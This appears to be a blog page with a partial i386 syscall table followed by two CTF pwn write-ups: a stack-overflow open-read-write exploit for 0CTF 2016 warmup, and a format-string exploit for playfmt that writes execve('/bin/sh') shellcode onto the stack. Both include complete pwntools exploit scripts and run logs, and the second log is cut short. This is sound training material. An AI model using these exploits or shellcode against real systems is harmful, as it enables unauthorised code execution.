204	setregid32	CC	?	?	?	?	?	?
205	getgroups32	CD	?	?	?	?	?	?
206	setgroups32	CE	?	?	?	?	?	?
207	fchown32	CF	?	?	?	?	?	?
208	setresuid32	D0	?	?	?	?	?	?
209	getresuid32	D1	?	?	?	?	?	?
210	setresgid32	D2	?	?	?	?	?	?
211	getresgid32	D3	?	?	?	?	?	?
212	chown32	D4	?	?	?	?	?	?
213	setuid32	D5	?	?	?	?	?	?
214	setgid32	D6	?	?	?	?	?	?
215	setfsuid32	D7	?	?	?	?	?	?
216	setfsgid32	D8	?	?	?	?	?	?
217	pivot_root	D9	const char *new_root	const char *put_old	-	-	-	-
218	mincore	DA	unsigned long start	size_t len	unsigned char * vec	-	-	-
219	madvise	DB	unsigned long start	size_t len	int behavior	-	-	-
220	getdents64	DC	unsigned int fd	struct linux_dirent64 *dirent	unsigned int count	-	-	-
221	fcntl64	DD	unsigned int fd	unsigned int cmd	unsigned long arg	-	-	-
222	not implemented	DE
223	not implemented	DF
224	gettid	E0	-	-	-	-	-	-
225	readahead	E1	int fd	loff_t offset	size_t count	-	-	-
226	setxattr	E2	const char *path	const char *name	const void *value	size_t size	int flags	-
227	lsetxattr	E3	const char *path	const char *name	const void *value	size_t size	int flags	-
228	fsetxattr	E4	int fd	const char *name	const void *value	size_t size	int flags	-
229	getxattr	E5	const char *path	const char *name	void *value	size_t size	-	-
230	lgetxattr	E6	const char *path	const char *name	void *value	size_t size	-	-
231	fgetxattr	E7	int fd	const char *name	void *value	size_t size	-	-
232	listxattr	E8	const char *path	char *list	size_t size	-	-	-
233	llistxattr	E9	const char *path	char *list	size_t size	-	-	-
234	flistxattr	EA	int fd	char *list	size_t size	-	-	-
235	removexattr	EB	const char *path	const char *name	-	-	-	-
236	lremovexattr	EC	const char *path	const char *name	-	-	-	-
237	fremovexattr	ED	int fd	const char *name	-	-	-	-
238	tkill	EE	pid_t pid	int sig	-	-	-	-
239	sendfile64	EF	int out_fd	int in_fd	loff_t *offset	size_t count	-	-
240	futex	F0	u32 *uaddr	int op	u32 val	struct timespec *utime	u32 *uaddr2	u32 val3
241	sched_setaffinity	F1	pid_t pid	unsigned int len	unsigned long *user_mask_ptr	-	-	-
242	sched_getaffinity	F2	pid_t pid	unsigned int len	unsigned long *user_mask_ptr	-	-	-
243	set_thread_area	F3	?	?	?	?	?	?
244	get_thread_area	F4	?	?	?	?	?	?
245	io_setup	F5	unsigned nr_reqs	aio_context_t *ctx	-	-	-	-
246	io_destroy	F6	aio_context_t ctx	-	-	-	-	-
247	io_getevents	F7	aio_context_t ctx_id	long min_nr	long nr	struct io_event *events	struct timespec *timeout	-
248	io_submit	F8	aio_context_t	long	struct iocb * *	-	-	-
249	io_cancel	F9	aio_context_t ctx_id	struct iocb *iocb	struct io_event *result	-	-	-
250	fadvise64	FA	int fd	loff_t offset	size_t len	int advice	-	-
251	not implemented	FB
252	exit_group	FC	int error_code	-	-	-	-	-
253	lookup_dcookie	FD	u64 cookie64	char *buf	size_t len	-	-	-
254	epoll_create	FE	int size	-	-	-	-	-
255	epoll_ctl	FF	int epfd	int op	int fd	struct epoll_event *event	-	-
256	epoll_wait	100	int epfd	struct epoll_event *events	int maxevents	int timeout	-	-
257	remap_file_pages	101	unsigned long start	unsigned long size	unsigned long prot	unsigned long pgoff	unsigned long flags	-
258	set_tid_address	102	int *tidptr	-	-	-	-	-
259	timer_create	103	clockid_t which_clock	struct sigevent *timer_event_spec	timer_t * created_timer_id	-	-	-
260	timer_settime	104	timer_t timer_id	int flags	const struct __kernel_itimerspec *new_setting	struct itimerspec *old_setting	-	-
261	timer_gettime	105	timer_t timer_id	struct __kernel_itimerspec *setting	-	-	-	-
262	timer_getoverrun	106	timer_t timer_id	-	-	-	-	-
263	timer_delete	107	timer_t timer_id	-	-	-	-	-
264	clock_settime	108	clockid_t which_clock	const struct __kernel_timespec *tp	-	-	-	-
265	clock_gettime	109	clockid_t which_clock	struct __kernel_timespec *tp	-	-	-	-
266	clock_getres	10A	clockid_t which_clock	struct __kernel_timespec *tp	-	-	-	-
267	clock_nanosleep	10B	clockid_t which_clock	int flags	const struct __kernel_timespec *rqtp	struct __kernel_timespec *rmtp	-	-
268	statfs64	10C	const char *path	size_t sz	struct statfs64 *buf	-	-	-
269	fstatfs64	10D	unsigned int fd	size_t sz	struct statfs64 *buf	-	-	-
270	tgkill	10E	pid_t tgid	pid_t pid	int sig	-	-	-
271	utimes	10F	char *filename	struct timeval *utimes	-	-	-	-
272	fadvise64_64	110	int fd	loff_t offset	loff_t len	int advice	-	-
273	vserver	111	?	?	?	?	?	?
274	mbind	112	unsigned long start	unsigned long len	unsigned long mode	const unsigned long *nmask	unsigned long maxnode	unsigned flags
275	get_mempolicy	113	int *policy	unsigned long *nmask	unsigned long maxnode	unsigned long addr	unsigned long flags	-
276	set_mempolicy	114	int mode	const unsigned long *nmask	unsigned long maxnode	-	-	-
277	mq_open	115	const char *name	int oflag	umode_t mode	struct mq_attr *attr	-	-
278	mq_unlink	116	const char *name	-	-	-	-	-
279	mq_timedsend	117	mqd_t mqdes	const char *msg_ptr	size_t msg_len	unsigned int msg_prio	const struct __kernel_timespec *abs_timeout	-
280	mq_timedreceive	118	mqd_t mqdes	char *msg_ptr	size_t msg_len	unsigned int *msg_prio	const struct __kernel_timespec *abs_timeout	-
281	mq_notify	119	mqd_t mqdes	const struct sigevent *notification	-	-	-	-
282	mq_getsetattr	11A	mqd_t mqdes	const struct mq_attr *mqstat	struct mq_attr *omqstat	-	-	-
283	kexec_load	11B	unsigned long entry	unsigned long nr_segments	struct kexec_segment *segments	unsigned long flags	-	-
284	waitid	11C	int which	pid_t pid	struct siginfo *infop	int options	struct rusage *ru	-
285	not implemented	11D
286	add_key	11E	const char *_type	const char *_description	const void *_payload	size_t plen	key_serial_t destringid	-
287	request_key	11F	const char *_type	const char *_description	const char *_callout_info	key_serial_t destringid	-	-
288	keyctl	120	int cmd	unsigned long arg2	unsigned long arg3	unsigned long arg4	unsigned long arg5	-
289	ioprio_set	121	int which	int who	int ioprio	-	-	-
290	ioprio_get	122	int which	int who	-	-	-	-
291	inotify_init	123	-	-	-	-	-	-
292	inotify_add_watch	124	int fd	const char *path	u32 mask	-	-	-
293	inotify_rm_watch	125	int fd	__s32 wd	-	-	-	-
294	migrate_pages	126	pid_t pid	unsigned long maxnode	const unsigned long *from	const unsigned long *to	-	-
295	openat	127	int dfd	const char *filename	int flags	umode_t mode	-	-
296	mkdirat	128	int dfd	const char * pathname	umode_t mode	-	-	-
297	mknodat	129	int dfd	const char * filename	umode_t mode	unsigned dev	-	-
298	fchownat	12A	int dfd	const char *filename	uid_t user	gid_t group	int flag	-
299	futimesat	12B	int dfd	const char *filename	struct timeval *utimes	-	-	-
300	fstatat64	12C	int dfd	const char *filename	struct stat64 *statbuf	int flag	-	-
301	unlinkat	12D	int dfd	const char * pathname	int flag	-	-	-
302	renameat	12E	int olddfd	const char * oldname	int newdfd	const char * newname	-	-
303	linkat	12F	int olddfd	const char *oldname	int newdfd	const char *newname	int flags	-
304	symlinkat	130	const char * oldname	int newdfd	const char * newname	-	-	-
305	readlinkat	131	int dfd	const char *path	char *buf	int bufsiz	-	-
306	fchmodat	132	int dfd	const char * filename	umode_t mode	-	-	-
307	faccessat	133	int dfd	const char *filename	int mode	-	-	-
308	pselect6	134	int	fd_set *	fd_set *	fd_set *	struct timespec *	void *
309	ppoll	135	struct pollfd *	unsigned int	struct timespec *	const sigset_t *	size_t	-
310	unshare	136	unsigned long unshare_flags	-	-	-	-	-
311	set_robust_list	137	struct robust_list_head *head	size_t len	-	-	-	-
312	get_robust_list	138	int pid	struct robust_list_head * *head_ptr	size_t *len_ptr	-	-	-
313	splice	139	int fd_in	loff_t *off_in	int fd_out	loff_t *off_out	size_t len	unsigned int flags
314	sync_file_range	13A	int fd	loff_t offset	loff_t nbytes	unsigned int flags	-	-
315	tee	13B	int fdin	int fdout	size_t len	unsigned int flags	-	-
316	vmsplice	13C	int fd	const struct iovec *iov	unsigned long nr_segs	unsigned int flags	-	-
317	move_pages	13D	pid_t pid	unsigned long nr_pages	const void * *pages	const int *nodes	int *status	int flags
318	getcpu	13E	unsigned *cpu	unsigned *node	struct getcpu_cache *cache	-	-	-
319	epoll_pwait	13F	int epfd	struct epoll_event *events	int maxevents	int timeout	const sigset_t *sigmask	size_t sigsetsize
320	utimensat	140	int dfd	const char *filename	struct timespec *utimes	int flags	-	-
321	signalfd	141	int ufd	sigset_t *user_mask	size_t sizemask	-	-	-
322	timerfd_create	142	int clockid	int flags	-	-	-	-
323	eventfd	143	unsigned int count	-	-	-	-	-
324	fallocate	144	int fd	int mode	loff_t offset	loff_t len	-	-
325	timerfd_settime	145	int ufd	int flags	const struct __kernel_itimerspec *utmr	struct __kernel_itimerspec *otmr	-	-
326	timerfd_gettime	146	int ufd	struct __kernel_itimerspec *otmr	-	-	-	-
327	signalfd4	147	int ufd	sigset_t *user_mask	size_t sizemask	int flags	-	-
328	eventfd2	148	unsigned int count	int flags	-	-	-	-
329	epoll_create1	149	int flags	-	-	-	-	-
330	dup3	14A	unsigned int oldfd	unsigned int newfd	int flags	-	-	-
331	pipe2	14B	int *fildes	int flags	-	-	-	-
332	inotify_init1	14C	int flags	-	-	-	-	-
333	preadv	14D	unsigned long fd	const struct iovec *vec	unsigned long vlen	unsigned long pos_l	unsigned long pos_h	-
334	pwritev	14E	unsigned long fd	const struct iovec *vec	unsigned long vlen	unsigned long pos_l	unsigned long pos_h	-
335	rt_tgsigqueueinfo	14F	pid_t tgid	pid_t pid	int sig	siginfo_t *uinfo	-	-
336	perf_event_open	150	struct perf_event_attr *attr_uptr	pid_t pid	int cpu	int group_fd	unsigned long flags	-
337	recvmmsg	151	int fd	struct mmsghdr *msg	unsigned int vlen	unsigned flags	struct timespec *timeout	-
338	fanotify_init	152	unsigned int flags	unsigned int event_f_flags	-	-	-	-
339	fanotify_mark	153	int fanotify_fd	unsigned int flags	u64 mask	int fd	const char *pathname	-
340	prlimit64	154	pid_t pid	unsigned int resource	const struct rlimit64 *new_rlim	struct rlimit64 *old_rlim	-	-
341	name_to_handle_at	155	int dfd	const char *name	struct file_handle *handle	int *mnt_id	int flag	-
342	open_by_handle_at	156	int mountdirfd	struct file_handle *handle	int flags	-	-	-
343	clock_adjtime	157	clockid_t which_clock	struct timex *tx	-	-	-	-
344	syncfs	158	int fd	-	-	-	-	-
345	sendmmsg	159	int fd	struct mmsghdr *msg	unsigned int vlen	unsigned flags	-	-
346	setns	15A	int fd	int nstype	-	-	-	-
347	process_vm_readv	15B	pid_t pid	const struct iovec *lvec	unsigned long liovcnt	const struct iovec *rvec	unsigned long riovcnt	unsigned long flags
348	process_vm_writev	15C	pid_t pid	const struct iovec *lvec	unsigned long liovcnt	const struct iovec *rvec	unsigned long riovcnt	unsigned long flags
349	kcmp	15D	pid_t pid1	pid_t pid2	int type	unsigned long idx1	unsigned long idx2	-
350	finit_module	15E	int fd	const char *uargs	int flags	-	-	-
351	sched_setattr	15F	pid_t pid	struct sched_attr *attr	unsigned int flags	-	-	-
352	sched_getattr	160	pid_t pid	struct sched_attr *attr	unsigned int size	unsigned int flags	-	-
353	renameat2	161	int olddfd	const char *oldname	int newdfd	const char *newname	unsigned int flags	-
354	seccomp	162	unsigned int op	unsigned int flags	const char *uargs	-	-	-
355	getrandom	163	char *buf	size_t count	unsigned int flags	-	-	-
356	memfd_create	164	const char *uname_ptr	unsigned int flags	-	-	-	-
357	bpf	165	int cmd	union bpf_attr *attr	unsigned int size	-	-	-
358	execveat	166	int dfd	const char *filename	const char const argv	const char const envp	int flags	-
359	socket	167	int	int	int	-	-	-
360	socketpair	168	int	int	int	int *	-	-
361	bind	169	int	struct sockaddr *	int	-	-	-
362	connect	16A	int	struct sockaddr *	int	-	-	-
363	listen	16B	int	int	-	-	-	-
364	accept4	16C	int	struct sockaddr *	int *	int	-	-
365	getsockopt	16D	int fd	int level	int optname	char *optval	int *optlen	-
366	setsockopt	16E	int fd	int level	int optname	char *optval	int optlen	-
367	getsockname	16F	int	struct sockaddr *	int *	-	-	-
368	getpeername	170	int	struct sockaddr *	int *	-	-	-
369	sendto	171	int	void *	size_t	unsigned	struct sockaddr *	int
370	sendmsg	172	int fd	struct user_msghdr *msg	unsigned flags	-	-	-
371	recvfrom	173	int	void *	size_t	unsigned	struct sockaddr *	int *
372	recvmsg	174	int fd	struct user_msghdr *msg	unsigned flags	-	-	-
373	shutdown	175	int	int	-	-	-	-
374	userfaultfd	176	int flags	-	-	-	-	-
375	membarrier	177	int cmd	int flags	-	-	-	-
376	mlock2	178	unsigned long start	size_t len	int flags	-	-	-
377	copy_file_range	179	int fd_in	loff_t *off_in	int fd_out	loff_t *off_out	size_t len	unsigned int flags
378	preadv2	17A	unsigned long fd	const struct iovec *vec	unsigned long vlen	unsigned long pos_l	unsigned long pos_h	rwf_t flags
379	pwritev2	17B	unsigned long fd	const struct iovec *vec	unsigned long vlen	unsigned long pos_l	unsigned long pos_h	rwf_t flags
380	pkey_mprotect	17C	unsigned long start	size_t len	unsigned long prot	int pkey	-	-
381	pkey_alloc	17D	unsigned long flags	unsigned long init_val	-	-	-	-
382	pkey_free	17E	int pkey	-	-	-	-	-
383	statx	17F	int dfd	const char *path	unsigned flags	unsigned mask	struct statx *buffer	-
384	arch_prctl	180	?	?	?	?	?	?

WriteUp: 0CTF 2016 warmup

2022-04-13T10:51:39.000Z

0x0 Checksec

Arch:     i386-32-little
RELRO:    No RELRO
Stack:    No canary found
NX:       NX enabled
PIE:      No PIE (0x8048000)

0x1 Reverse Enginnering

.text:0804815A ; =============== S U B R O U T I N E =======================================
.text:0804815A
.text:0804815A
.text:0804815A stackoverflow   proc near               ; CODE XREF: start+2B↑p
.text:0804815A
.text:0804815A fd              = dword ptr -30h
.text:0804815A addr            = dword ptr -2Ch
.text:0804815A len             = dword ptr -28h
.text:0804815A var_20          = byte ptr -20h
.text:0804815A
.text:0804815A                 sub     esp, 30h
.text:0804815D                 mov     [esp+30h+fd], 0 ; fd
.text:08048164                 lea     eax, [esp+30h+var_20]
.text:08048168                 mov     [esp+30h+addr], eax ; addr
.text:0804816C                 mov     [esp+30h+len], 34h ; len
.text:08048174                 call    read
.text:08048179                 mov     [esp+30h+fd], 1 ; fd
.text:08048180                 mov     [esp+30h+addr], offset aGoodLuck ; "Good Luck!\n"
.text:08048188                 mov     [esp+30h+len], 0Bh ; len
.text:08048190                 call    write
.text:08048195                 mov     eax, 0DEADBEAFh
.text:0804819A                 mov     ecx, 0DEADBEAFh
.text:0804819F                 mov     edx, 0DEADBEAFh
.text:080481A4                 mov     ebx, 0DEADBEAFh
.text:080481A9                 mov     esi, 0DEADBEAFh
.text:080481AE                 mov     edi, 0DEADBEAFh
.text:080481B3                 mov     ebp, 0DEADBEAFh
.text:080481B8                 add     esp, 30h
.text:080481BB                 retn
.text:080481BB stackoverflow   endp

漏洞点在于：frame stack大小为0x30; read写入的变量为var_20，其内存位置为：[esp+30h+var_20]即[esp + 0x30 - 0x20],因此var_20变量若写入内容超过0x20, 则会发生stack overflow. 在该函数中，读取的len为0x34，明显超过0x20,即发生stack overflow，覆盖ret address,污染控制流.

0x2 Analyze

该题目的stack overflow很容发现，利用也毫无难点。但该函数为静态编译，且其中用int 0x80的方式调用system call。由于该文件体简单且小，又无libc.so等库，因此无法找出有效可用的rop chain.

该题目中使用了int 0x80的方式进行read和write, 且有良好布局system call调用的代码片段，如下：
(.text:08048122 -> .text:08048134)

.text:0804811D read            proc near               ; CODE XREF: stackoverflow+1A↓p
.text:0804811D
.text:0804811D fd              = dword ptr  4
.text:0804811D addr            = dword ptr  8
.text:0804811D len             = dword ptr  0Ch
.text:0804811D
.text:0804811D                 mov     eax, 3
.text:08048122                 mov     ebx, [esp+fd]   ; fd 
.text:08048126                 mov     ecx, [esp+addr] ; addr
.text:0804812A                 mov     edx, [esp+len]  ; len
.text:0804812E                 int     80h             ; LINUX - sys_read
.text:08048130                 test    eax, eax
.text:08048132                 js      short sub_804814D
.text:08048134                 retn
.text:08048134 read            endp
.text:08048134

若能控制eax的值，则能达到调用任意system_call函数的目的。

因此两种思路：

使用system函数
设置eax = 0xb, 调用 execve("/bin/sh")
使用open-read-write链
open("flag", 0); //eax = 5
read(3, buffer, len); //eax = 3
write(1, buffer, len); // eax = 4
其中read,write在二进制中都有完整的函数可用，不必自己重新构造。

控制eax的思路为使用alarm函数。
第一次调用alarm时，设定发送SIGALRM信号的时间；第二次调用alarm时，将会把前一次alarm***剩余的***时间返回。

注意是剩余的时间而非流失的时间。

但由于在该题目中，首次调用alarm设定的时间为10秒，小于system('/bin/sh')所需要的0xb,因此只能采用open-read-write链。

0x3 Exploit Code

#!python3
from pwn import *
from pwnlib.util import misc
import os

elf = context.binary = ELF("warmup")
libc = elf.libc

context.terminal = ["tmux", "split", "-h"]
context.log_level = 'debug'

gs = '''
continue
'''
def start():
    if args.GDB:
        p = process(elf.path)
        cmd = ["gdb", "-p", str(p.pid)]
        cmd = context.terminal + cmd
        cmd = ' '.join(cmd) 
        os.system(cmd)
        time.sleep(1)
        return p
    elif args.REMOTE:
        return remote('node4.buuoj.cn', 25353)
    else:
        return process(elf.path)

#--------- Process Interactive ---------------------

io = start()
io.timeout = 30
tic = time.time()

io.recvuntil(b'Welcome to 0CTF 2016!\n')

alarm = 0x804810D
read = 0x804811D
write = 0x08048135 
stackoverlow = 0x804815A

mov_esp_bcd_int = 0x8048122 
""" 设置eax后,ebx,ecx,edx都从栈上读出,即可调用system_call
.text:08048122                 mov     ebx, [esp+4]    
.text:08048126                 mov     ecx, [esp+8]  
.text:0804812A                 mov     edx, [esp+12]   
.text:0804812E                 int     80h              
"""

# 从vmmap中，找到一块可写内存，用来保存flag文件路径和内容。
buffer = 0x8049600

##### 1.  read flag path into buffer
payload = b'A'*0x20 
payload += p32(read)    #stackoverlow return address
payload += p32(stackoverlow)    #read return address
payload += p32(0)       #fd
payload += p32(buffer)  #addr
payload += p32(6)       #len
io.send(payload)
if args.GDB:
    ctn = io.recvuntil(b"Good Luck!\n")
else:
    ctn = io.recvline()
io.send(b"flag\0")

##### 2.  open flag file; 
# system_call open >> eax:0x5; ebx:char* file_name; ecx: flags; edx: mode
# 第二次调用alarm函数，会返回距离第一次调用alarm 剩余的时间(秒)

toc = time.time()
# time.sleep(5) ### alarm设置10秒，sleep 5秒，剩余5秒
log.info("alarm time: {}".format(toc-tic))
time.sleep(5 - (toc - tic))
payload = b'A'*0x20
payload += p32(alarm)
payload += p32(mov_esp_bcd_int)
payload += p32(stackoverlow)
payload += p32(buffer)  #ebx file_name
payload += p32(0)       #ecx flags (0: O_RDONLY, 1: O_WRONLY, 2: O_RDWR)
# payload += p32(0)       #edx
io.send(payload)
if args.GDB:
    ctn = io.recvuntil(b"Good Luck!\n")
else:
    ctn = io.recvline()

##### 3.  read flag content into buffer
payload = b'A'*0x20
payload += p32(read)
payload += p32(stackoverlow)
payload += p32(3)       #fd
payload += p32(buffer)  #addr
payload += p32(0x100)   #len
io.send(payload)
if args.GDB:
    ctn = io.recvuntil(b"Good Luck!\n")
else:
    ctn = io.recvline()

##### 4.  write flag content into stdout
payload = b'A'*0x20
payload += p32(write)
payload += p32(stackoverlow)    #call valid function to make binary happy, exploit stable
payload += p32(1)       #fd
payload += p32(buffer)  #addr
payload += p32(0x100)   #len
io.send(payload)
if args.GDB:
    ctn = io.recvuntil(b"Good Luck!\n")
else:
    ctn = io.recvline()

flag = io.recv()
log.info(f"flag: {flag}")

# =============================================================================
# io.interactive()
io.close()

0x4 Output Example

╰─$ python exp.py REMOTE   

[*] 'warmup/warmup'
    Arch:     i386-32-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)
[+] Opening connection to node4.buuoj.cn on port 25353: Done
[DEBUG] Received 0x16 bytes:
    b'Welcome to 0CTF 2016!\n'
[DEBUG] Sent 0x34 bytes:
    00000000  41 41 41 41  41 41 41 41  41 41 41 41  41 41 41 41  │AAAA│AAAA│AAAA│AAAA│
    *
    00000020  1d 81 04 08  5a 81 04 08  00 00 00 00  00 96 04 08  │····│Z···│····│····│
    00000030  06 00 00 00                                         │····│
    00000034
[DEBUG] Received 0xb bytes:
    b'Good Luck!\n'
[DEBUG] Sent 0x5 bytes:
    00000000  66 6c 61 67  00                                     │flag│·│
    00000005
[*] alarm time: 0.08231258392333984
[DEBUG] Sent 0x34 bytes:
    00000000  41 41 41 41  41 41 41 41  41 41 41 41  41 41 41 41  │AAAA│AAAA│AAAA│AAAA│
    *
    00000020  0d 81 04 08  22 81 04 08  5a 81 04 08  00 96 04 08  │····│"···│Z···│····│
    00000030  00 00 00 00                                         │····│
    00000034
[DEBUG] Received 0xb bytes:
    b'Good Luck!\n'
[DEBUG] Sent 0x34 bytes:
    00000000  41 41 41 41  41 41 41 41  41 41 41 41  41 41 41 41  │AAAA│AAAA│AAAA│AAAA│
    *
    00000020  1d 81 04 08  5a 81 04 08  03 00 00 00  00 96 04 08  │····│Z···│····│····│
    00000030  00 01 00 00                                         │····│
    00000034
[DEBUG] Received 0xb bytes:
    b'Good Luck!\n'
[DEBUG] Sent 0x34 bytes:
    00000000  41 41 41 41  41 41 41 41  41 41 41 41  41 41 41 41  │AAAA│AAAA│AAAA│AAAA│
    *
    00000020  35 81 04 08  5a 81 04 08  01 00 00 00  00 96 04 08  │5···│Z···│····│····│
    00000030  00 01 00 00                                         │····│
    00000034
[DEBUG] Received 0xb bytes:
    b'Good Luck!\n'
[DEBUG] Received 0x100 bytes:
    00000000  66 6c 61 67  7b 31 38 31  31 61 64 61  65 2d 38 35  │flag│{181│1ada│e-85│
    00000010  31 38 2d 34  38 31 36 2d  61 66 66 32  2d 30 31 65  │18-4│816-│aff2│-01e│
    00000020  65 65 62 32  64 63 62 33  38 7d 0a 00  00 00 00 00  │eeb2│dcb3│8}··│····│
    00000030  00 00 00 00  00 00 00 00  00 00 00 00  00 00 00 00  │····│····│····│····│
    *
    00000100
[*] flag: b'flag{▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇}\n\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
[*] Closed connection to node4.buuoj.cn port 25353

0x5 The Challenge

https://buuoj.cn/challenges#warmup

WriteUp: hitcontraining_playfmt

2022-04-11T12:25:50.000Z

Checksec

╰─$ checksec playfmt
[*] 'hitcontraining_playfmt/playfmt'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x8048000)
    RWX:      Has RWX segments

重要信息：

a. i386 因此直接gdb.debug打开或者process打开用gdb.attach会有问题；需要特殊的处理，见后面exploit代码的start；
b. Has RWX segments: 有可写可执行段，gdb playfmt后vmmap可以看到是stack
c. No PIE: 因此ELF中符号，在ELF静态文件中的偏移即为加载后的偏移。但堆栈会随机化

Reverse Engineering

Fig. 1. Vulnerability Point

漏洞点在上图中的标号(1)处,为Format String Attack.

Analyze

read->printf在while(True)循环中，因此可以无限次构造payload，理论上可以实现任意地址写。

但buf不在stack上，因此在payload中，任意写的目的地址无法直接通过字符串中指定，需要找到一个如下的栈链。

stack a: -> stack b 
...
stack b: -> stack c 
...
stack c: -> 任意值

原理实质上很简单，通过Format String Attack的任意地址写，将Shell Code写入到RWX权限的栈上，并再次使用Format String Attack修改函数返回地址为Shell Code在栈上的地址。触发函数返回后即可获得shell。
但在实际exploit时，有很多细节要注意：

a. 当 %Mc 之 M过大时，要留出足够的时间让程序完成完整printf行为。实际上应尽可能的让M值不要过大，不然容易失败。在exploit code中，我们采用了io.recvuntil(b'\n')的方式，用b'\n'字符作为输出结束的约定字符，这样即保证printf行为完整，又避免了过久等待。
b. stack链应避免使用ebp->prev-frame-esp->prevprev-frame-esp...的ebp栈链，否则在函数返回时，通过ebp恢复esp值时容易出错。
- 当然无其他选择时，ebp栈链也是可以操作的，需要注意操作后的恢复工作，保证ebp链的合法性。
- 且ebp栈链的好处是，它肯定是存在的，且距离不远，很容易找到。
c. 该exploit code避免使用了one_gadget,system等需要libcSearcher搜索判断远程libc.so版本的操作

Exploit Code

#!python3
from pwn import *
from pwnlib.util import misc
from LibcSearcher import *
import os

elf = context.binary = ELF("playfmt")
libc = elf.libc

context.terminal = ["tmux", "split", "-h"]

gs = '''
continue
'''
def start():
    if args.GDB:
        p = process(elf.path)
        cmd = ["gdb", "-p", str(p.pid)]
        cmd = context.terminal + cmd
        cmd = ' '.join(cmd) 
        os.system(cmd)
        time.sleep(1)
        return p
    elif args.REMOTE:
        return remote('node4.buuoj.cn', 28106)
    else:
        return process(elf.path)

#--------- Process Interactive ---------------------

l = lambda x,y : log.info(f"{x} -> {y}")

def readByFmtStr(fmtstr):
    io.send(fmtstr)
    addr = int(io.recv(), 16)
    return addr


io = start()
io.timeout = 3000
io.recv()


ebp = readByFmtStr(b"%6$p")
l("ebp", hex(ebp))

#leak chain value 
chain = readByFmtStr(b"%21$p")
l("chain", hex(chain))



shell = """
xor ecx,ecx
mul ecx
push eax
mov al,0xb
push 0x68732f2f   
push 0x6e69622f   
mov ebx,esp
int 0x80
"""

shell_bs = asm(shell, arch="i386", os="linux")
check = disasm(shell_bs)
l("check", check)

l("shell_bs", shell_bs)
hexstr = ''
for i in range(len(shell_bs)):
    hexstr += '\\x' +  hex(shell_bs[i])[2:]

l("hexstr", hexstr)

### 将shellcode放到chain-0x300的位置

shell_addr = chain & 0xffff00ff
l("shell_addr", hex(shell_addr))

## write int8 value to address by low16
# 通过栈低16位定位写入地址，写入指定值(int8)

def write_int8(addr_low16, byte_value):
    log.info(f"write_int8: {hex(addr_low16)} {hex(byte_value)}")
    addr_low16 = addr_low16 & 0xffff

    # change 0b:002c value low16
    payload = f"%{addr_low16}c%21$hn"
    payload = payload.encode()
    payload += b"\n\x00"
    # log.info(f"payload 1: {payload}")
    io.send(payload)
    ctn = ""
    ctn = io.recvuntil(b"\n")
    
    
    # change addr_low16 value 
    payload = f"%{byte_value}c%57$hhn"
    if byte_value == 0:
        payload = f"%57$hhn"
    payload = payload.encode()
    payload += b"\n\x00"
    # log.info(f"payload 2: {payload}")
    io.send(payload)
    ctn = ""
    ctn = io.recvuntil(b"\n")



for i in range(0, len(shell_bs)):
    aByte = shell_bs[i]
    addr_low16 = shell_addr + i

    write_int8(addr_low16, aByte)


# # # 返回地址修改为shell_addr

ret_addr = ebp - 0xc    # 0xff88e6d4 - 0xe8  --> esp 
l("ret_addr", hex(ret_addr))

shell_addr_bs = p32(shell_addr)
l("shell_addr", hex(shell_addr))
# l("shell_addr_bs", shell_addr_bs)

for i in range(0, len(shell_addr_bs)):
    aByte = shell_addr_bs[i]
    addr_low16 = ret_addr + i

    write_int8(addr_low16, aByte)

# # quit 触发返回
io.sendline(b"quit")
# ctn = io.recv()

####### Got Shell #######
# cat flag
io.sendline(b'cat flag')
flag = io.recv()
log.info(f"flag: {flag}")

# ============================================================
# io.interactive()
io.close()



#### 附录：
#    
"""
16:0058│     0xff88e644 —▸ 0xff88e6d4 —▸ 0xff8900ca ◂— '../playfmt'
...
3a:00e8│     0xff88e6d4 —▸ 0xff8900ca ◂— '../playfmt'
"""

Output Example

╰─$ python exp.py REMOTE
[*] 'hitcontraining_playfmt/playfmt'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x8048000)
    RWX:      Has RWX segments
[*] '/lib/i386-linux-gnu/libc-2.27.so'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[+] Opening connection to node4.buuoj.cn on port 28106: Done
[*] ebp -> 0xffb2d448
[*] chain -> 0xffb2d504
[*] check ->    0:   31 c9                   xor    ecx, ecx
       2:   f7 e1                   mul    ecx
       4:   50                      push   eax
       5:   b0 0b                   mov    al, 0xb
       7:   68 2f 2f 73 68          push   0x68732f2f
       c:   68 2f 62 69 6e          push   0x6e69622f
      11:   89 e3                   mov    ebx, esp
      13:   cd 80                   int    0x80
[*] shell_bs -> b'1\xc9\xf7\xe1P\xb0\x0bh//shh/bin\x89\xe3\xcd\x80'
[*] hexstr -> \x31\xc9\xf7\xe1\x50\xb0\xb\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80
[*] shell_addr -> 0xffb20004
